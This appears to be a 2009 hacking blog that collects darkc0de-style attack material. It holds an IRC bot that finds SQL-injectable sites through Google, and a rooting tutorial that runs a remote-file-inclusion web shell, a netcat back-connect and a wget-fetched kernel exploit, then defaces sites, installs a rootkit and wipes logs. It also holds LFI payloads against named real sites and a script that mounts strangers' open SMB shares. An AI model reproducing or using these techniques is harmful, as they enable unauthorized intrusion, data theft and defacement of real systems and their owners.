Monday, March 9, 2009

Using SQLi Scanner Bot - sqlifinderbot.py (Video - QuickTime Required) [Source]

Download Tutorial :- http://darkc0de.com/tutorials/SQLiFinderb0t.zip


#!/usr/bin/env python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# SQLi Error Scanner /w Google Search

# darkc0decracker Crew
# www.darkc0decracker.blogspot.com

# Greetz to
# d3hydr0, P47r1ck, Tarsian, c0mr@d, reverenddigitalx, beenu, baltazar, C1c4Tr1Z, Well0ne
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

import sys, socket, re, string, urllib2, sets, random, time, threading

if len(sys.argv) != 5:
print "Usage: ./sqlifinderb0t.py "
sys.exit(1)

agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

langs = ["en", "it", "nl", "ru", "ua", "pl", "de", "be", "kr", "fr", "es", "se", "no", "ir", "za"]
sites=[]
tba=[]
threads =[]
numthreads = 1
verbose = 0
#---------------------------------------------------------
#Edit what you want added to the address.
EXT = "'"

#Edit what you want to search for.
MATCH = "error in your SQL syntax"
#---------------------------------------------------------

def getsites(lang):
try:
page_counter=0
while page_counter < int(arg_page_end):
s.send("PONG %s\r\n" % line[1])
time.sleep(3)
results_web = 'http://www.google.com/search?q='+str(query)+'&hl='+str(lang)+'&lr=&ie=UTF-8&start='+repr(page_counter)+'&sa=N'
request_web = urllib2.Request(results_web)
request_web.add_header('User-Agent',random.choice(agents))
opener_web = urllib2.build_opener()
text = opener_web.open(request_web).read()
if re.search("403 Forbidden", text):
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Received Captcha... Damn that sucks!"))
break
names = re.findall(('+[\w\d\?\/\.\=\s\-]+=+[\d]+[\w\d\?\/\.\=\s\-]+'),text.replace("","").replace("",""))
for name in names:
name = re.sub(" - \d+k - ","",name.replace("","")).replace("","")
name = name.rstrip(" -")
sites.append(name)
page_counter +=10

except IOError:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Can't connect to Google Web!"))

def parse_urls(links):
urls = []
for link in links:
num = link.count("=")
if num > 0:
for x in xrange(num):
link = link.rsplit(('=+[\d]'),x+1)[0]
urls.append(link+EXT)
urls = list(sets.Set(urls))
return urls

def test(host):
socket.setdefaulttimeout(5)
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Testing:", host))
try:
if host[:7] != "http://":
host = "http://"+host
source = urllib2.urlopen(host).read()
if re.search(MATCH, source):
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[!] Found:", host))
file = open("foundsqli.txt", "a")
file.write("\n[!] Found: "+host)
file.close()
else:
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[-] Not Vuln:", host))
except(socket.gaierror, socket.timeout, socket.error), msg:
s.send("PRIVMSG %s :%s%s @ %s\r\n" % (CHAN, "[-] Error: ",msg, host))
except:
pass

class TestThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts
self.fcount = 0
threading.Thread.__init__(self)

def run (self):
urls = parse_urls(self.hosts)
for url in urls:
try:
test(url.replace("\n",""))
except(KeyboardInterrupt):
pass
file = open("sqlitested.txt", "a")
for tbw in self.hosts:
file.write(tbw+"\n")
file.close()
self.fcount+=1

PASS = ""
HOST = sys.argv[1]
PORT = int(sys.argv[2])
NICK = sys.argv[3]
CHAN = sys.argv[4]
if len(sys.argv) == 6:
PASS = sys.argv[5]
readbuffer = ""
s=socket.socket( )
s.connect((HOST, PORT))
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (NICK, NICK, NICK))
s.send("JOIN :%s %s\r\n" % (CHAN, PASS))

while 1:
readbuffer=readbuffer+s.recv(1024)
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop( )
for line in temp:
line=string.rstrip(line)
line=string.split(line)
try:
if line[1] == "JOIN":
name = str(line[0].split("!")[0])
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "Welcome, ", name.replace(":","")))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| rsauron[at]gmail[dot]com v1.0"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| 8/2008 SQLi Finder Bot"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Scans Sites for SQLi errors"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Retreives Targets from Google"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Stores logs of Found and Tested"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Multi-Threading Scanning! - WOW"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| type !help - for help "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
if line[3] == ":!help":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Displaying list of commands the bot understands"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !status - Shows status of b0t!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !clear - Clears the hosts in the testing array!!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !search - Gets sites to test! ex. !search "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !show - Show list of sites to be tested!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !test - Preform Test on sites in testing array!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !langs - Shows a list a of langs that can be used for search function!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !threads - Set the number of threads to be used in testing.. default is 1!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !verbose - Verbosity ON = 1 - Verbosity OFF = 0 - Default is OFF"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !die - Kills b0t!"))
if line[3] == ":!langs":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] These are just some langs you could use...!"))
for lang in langs:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ",lang))
if line[3] == ":!die":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] b0t dying... vist darkc0de.com!!"))
sys.exit(1)
if line[3] == ":!search":
query = line[4]
lang = line[5]
arg_page_end = line[6]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Query: ", query))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Language: ", lang))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Search ends: ", arg_page_end))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Starting search..."))
getsites(lang)
sites = list(sets.Set(sites))
testedfile = open("sqlitested.txt", "r")
testedsites = testedfile.read()
testedfile.close()
if testedsites.endswith("\n"):
testedsites = testedsites.rstrip("\n")
testedsites = testedsites.split("\n")
s1 = set(sites)
s2 = set(testedsites)
tba = list(s1.difference(s2))
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Found ", len(tba), " sites to test!"))
if line[3] == ":!clear":
tba=[]
sites=[]
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Testing array cleared..."))
if line[3] == ":!status":
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of sites loaded in testing array: ", len(tba)))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for scanning: ", numthreads))
masterthread = 0
if threads != []:
for thread in threads:
masterthread+=thread.fcount
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads finished scanning: ", masterthread))
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))

if line[3] == ":!show":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Showing sites to be tested..."))
if len(tba) < 50:
for site in tba:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ", site))
else:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] More then 50 sites in list... Just to many hosts to print to term! sry!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Done!"))
if line[3] == ":!threads":
numthreads = line[4]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for testing: ", numthreads))
if line[3] == ":!verbose":
verbose = line[4]
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))
if line[3] == ":!test":
if tba == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] No sites to test..."))
else:
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Beginning test of ", len(tba), " sites!"))
threads=[]
i = len(tba) / int(numthreads)
for x in range(0, int(numthreads)):
if (x-1) == int(numthreads):
sliced = tba[x*i:]
else:
sliced = tba[x*i:(x+1)*i]
thread = TestThread(sliced)
thread.start()
threads.append(thread)

except(IndexError):
pass

if(line[0]=="PING"):
s.send("PONG %s\r\n" % line[1])

Sunday, March 8, 2009

R.F.I. Rooting Tutorial

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

Local File Inclusion Tutorial - Written by d3hydr0

Local File Inclusion Tutorial - Written by d3hydr0
[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..





Real World Examples:

http://www.jedit.org/index.php?page=..




Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63




This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62




include is the code , the script is using for example



$page = $_GET[page];
include($page);
?>




Should be [function.include]
but


$page = $_GET[page];
require_once($page);
?>




should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..




Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164




[b][function.require][/b]




So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php





other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

Tutorial on How To Hide Files in JPEG Images.

Tutorial on How To Hide Files in JPEG Images.

Written Tutorial:
In this example we will hide a text message inside a picture. We have choose for this tutorial a text file named Secret.txt and a picture firefox.jpg.

1. Move your files you want to combine in a new folder, in our case C:\Hidden.

2. Add the file you want to hide into a new RAR archive (in our example named Secret.txt.rar).

3. WinRar created the archive in the folder where our files are located.

4. Open Command Prompt (Start -> Run..., type cmd and press Enter).

5. Go to the folder where your files are located, in this case C:\Hidden by using the cmd command.

6. Now type copy /b firefox.jpg + secret.txt.rar helpero.jpg where firefox.jpg is the original picture, secret.txt.rar is the file that will be hidden, and helpero.jpg is the file which contains both.

7. If you open helpero.jpg you will see the firefox.jpg image.

8. Try opening the file with WinRar (select All files).


9. Now you can see the text file that is hidden in the picture.

Installing Nessus in Ubuntu

Open a terminal window and type in:
sudo apt-get install nessus
sudo apt-get install nessusd
sudo nessus-adduser
sudo ln -fs /etc/init.d/nessusd /etc/rc2.d/S20nessusd
sudo /etc/init.d/nessusd start
sudo gedit /usr/share/applications/Nessus.desktop

Insert the following lines into the new file

[Desktop Entry]
Name=Nessus
Comment=Nessus
Exec=nessus
Icon=/usr/share/pixmaps/nessus.xpm
Terminal=false
Type=Application
Categories=Application;System;

After that you can find Nessus in the Gnome menu under Applications -> System Tools.

Installing Ophcrack in Ubuntu

http://www.darkc0de.com/tutorials/ophcrack_install.html

Gmail BruteForce with gmailpopbrute.py (Video)

http://www.darkc0de.com/tutorials/gmailbrute.avi

MySQL Injection DataExt & Fuzzer

http://www.darkc0de.com/tutorials/schemafuzz-vid.zip

Airplay replay attack w/ no wireless client (Video)

http://www.darkc0de.com/tutorials/Airplay_replay_attack_-_no_wireless_client_required.rar

128 bit WEP cracking w/ injection (video)

http://www.darkc0de.com/tutorials/128_Bit_Wep_Cracking_With_Injection_.rar

Testing SQL injection with with darkcode tools.(Video)

http://www.darkc0de.com/tutorials/sql_darkc0de.zip

Spoofing Useragents with firefox (Video Tutorial)

http://www.darkc0de.com/tutorials/user-agent.zip

List of: UserAgents.txt

Linux Rooting Video

http://www.darkc0de.com/tutorials/Linux_Rooting.rar

3 baltazar SQL Hack videos: [ Video 1 ] [ Video 2 ] [ Video 3 ]

video1 :- http://www.darkc0de.com/tutorials/izlasci.rar



video2 :- http://www.darkc0de.com/tutorials/jafra.rar



video3 :- http://www.darkc0de.com/tutorials/sdm.rar

SQL Hack Video 2

http://www.darkc0de.com/tutorials/sqlshow1.avi.zip

Saturday, March 7, 2009

SQL Hack Video

http://www.darkc0de.com/tutorials/sqlshow.avi.zip

Video Tutorial ( PHP ATM ADMIN HASH )

http://www.darkc0de.com/tutorials/PHP-ATM-Admin-Hash.rar

Video Tutorial ( PHP-ATM . Get Shell )

http://www.darkc0de.com/tutorials/php-atm.rar

Video Tutorial ( NC-How to Blind Shell in linux)

http://www.darkc0de.com/tutorials/nc-bind-port-in-linux.rar

Video Tutorial ( NC-How to get Connect Back)

http://www.darkc0de.com/tutorials/nc_Connect-Back.rar

Robots.txt harmless? Or dangerous?

Robots.txt harmless? Or dangerous?
By d3hydro

So alright... what is this strange file in the root of your directories you question?

Let me break down what it basically is... all it basically is, is a rule set for search engines.

Example of a robot.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This is a User agent... example Firefox or Konqueror, * is anything.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now lets talk about why robots.txt can be dangerous.

All websites out there that are using the Robots file most likely have it exposed.

Here take this - http://k0h.org/robots.txt

Well your probably asking what do I do now? Instead of using root folders of your "private" things, make a new folder named something like 021873257923 then store the other folder in there. Note... never ever store very important things on your Webserver, even if its protected by robots.txt.

Now lets build our own robots.txt file.

# This is a comment... these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa's bot is a bit aggressive so I think I shall make it wait 1 minute (60 seconds) until it can view another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok... see I have over 300 folders staring with admin... none should be indexed... what do I do? Is there some sort of wildcard I can use?

Simply Disallow: /admin without the ending /.

Are there engines that do not obey robots.txt?

Yep.

My host disallows Robots.txt...

They probably don't... you just have not tryed selecting view hidden files in your FTP client. Look into others methods... google is your friend.

On a side note. I have not written this in the official tutorial, but alot of people asked me why make a directory 349823423423 for instance and the answer is because it is harder for script kiddies to do a directory name brute force on your site and find out your private directories name.

Cut No paste, Angry IP Stripper...

Angry IP Stripper...

I hate cut n pasting IP's from Angry IP to my command prompt or from my Export of scanned IP's from Angry to cmd.
I looked at ways to speed up the process of doing the following command "net view \\" without the need to go back and forth from one window to another 50 times to find a small list of IP's with open shares.

I ask around on a few different Forums and someone gave me the key to make one command to stripped Agry's export and out put the IP's into CMD with the command net view \\ and do the crap work for me.

So now I can type one command or cut n paste one command to do 50 or whatever search's for open share's.

Here it is...

for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

Ok let me explain a few things.

When Angry has finished scanning a range, I export the results to a .txt file, I might name it 1.txt or 2.txt.

Inside the txt file it looks like this
-------------------------------
This file was generated by Angry IP Scanner
Visit http://www.angryziber.com/ for the latest version


Scanned 217.81.105.1 - 217.81.255.255 (Ports: 5110,139,12345,23,445)
24/03/2008 11:59:28 PM

IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports

217.81.122.148 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.128.1 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.136.236 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.143.82 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.190.34 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.209.185 651 ms N/A N/A N/A N/A N/A N/A 23
217.81.230.253 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.235.126 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.246.211 198 ms N/A N/A N/A N/A N/A N/A 23
217.81.248.34 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139
217.81.250.37 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23
217.81.251.202 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139
217.81.255.60 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445
-------------------------

I dont have to get Angry to save all this info, I just like looking at the different names to get a feel of what a system might have on it.

That export is saved to c:\ for example, I run cmd.exe, goto c:\, type dir and there it is.

I paste in the for command, for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat


I double check its going to look in the correct txt file and also pick a name for the bat file, (auto, 1, run) it doesnt matter what the .bat is called, once I check and see the info is correct I hit enter...

Then type the name of the .bat file and its running by itself..

--------------------------
Ctrl-Break, to stop the batch file running. Hit 3 or 4 times and wait 10 seconds..

So for me it looks like this
-
C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1
.bat

C:\>1
C:\>net view \\217.81.122.148
System error 53 has occurred. <---(Most likely firewall)
The network path was not found.
C:\>net view \\217.81.128.1

-

The other thing I do is increase the command prompt height buffer so that all the information scrolling a long doesnt get lost, right click command prompt, select properties, layout, increase screen buffer size Height to 1000 or more depending on how many IPS you need to check.

Sit back and wait for it to go through the list, 50's a good number. once its done, right click the screen, mark it all, right click it again and save it in note pad and check what you have to open up..
-
net view \\89.214.144.144
Shared resources at \\89.214.144.144
Sandra
Share name Type Used as Comment
-------------------------------------------------------------
C Disk
Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007
Fact2007 Disk
HP Photosmart 7400 Series Print HP Photosmart 7400 Series
I Disk
Public Disk
Users Disk
The command completed successfully.
-

(One scan brought up this list of drives on a share.)

c:\net use k: \\89.214.144.144\C
c:\The command completed successfully.
c:\net use L: \\89.214.144.144\Fact2007
c:\The command completed successfully
c:\net use M: \\89.214.144.144\I
c:\The command completed successfully

Now in my compuer under network drives, I have 3 new shares to look at.

c on '89.214.144.144'
Fact2007 on '89.214.144.144'
I on '89.214.144.144'


Once your done browsing don't forget to right click on these and disconnect, otherwise your system will run real slow.

Also each time you run the for command and you dont change the name of your .bat file new infomation is added to it instead of it been over written.
Why this is, Im not sure, it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.

c:\edit *.bat, Select shift-Arrow Down to select a portion to delete is another option.
Edit also lets to look at what the bat looks like. The start of the bat has a little junk in it it while its running.

---
C:\>1
C:\>net view \\This
System error 53 has occurred.
The network path was not found.
C:\>net view \\Visit
System error 53 has occurred.
The network path was not found.
C:\>net view \\Scanned
System error 53 has occurred.
The network path was not found.
C:\>net view \\24/03/2008
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
C:\>net view \\IP
System error 53 has occurred.
The network path was not found.
C:\>net view \\217.81.99.29
-

Edit the bat file to remove the first couple of lines ot just ignore it and let it run.

c:\for /?

Brings up all the help info on the "for" command, I never knew about it until I started asking about how to do this, I was exspecting someone to write a perl script or something, but this just goes to show theres still a lot to learn inside windows and all the little files that are with in.

I hope you guys find this useful and a real time saver and look at new ways to use the for command.

Regards Joffa...

Computer Acronyms ,The List

Computer Acronyms ,The List

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft?/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB ? MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
